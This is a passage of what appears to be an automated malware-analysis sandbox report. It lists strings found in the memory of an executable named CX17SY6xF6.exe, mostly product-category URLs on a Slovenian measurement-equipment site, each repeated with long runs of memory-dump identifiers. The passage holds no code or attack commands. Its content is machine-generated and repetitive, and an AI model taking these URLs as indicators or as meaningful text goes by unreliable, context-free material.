00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/merilni
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/monitor
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/prenosn
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/program
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/radiaci
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/registr
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-brezz
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-seti/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vecka
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vsi/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-za-ex
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 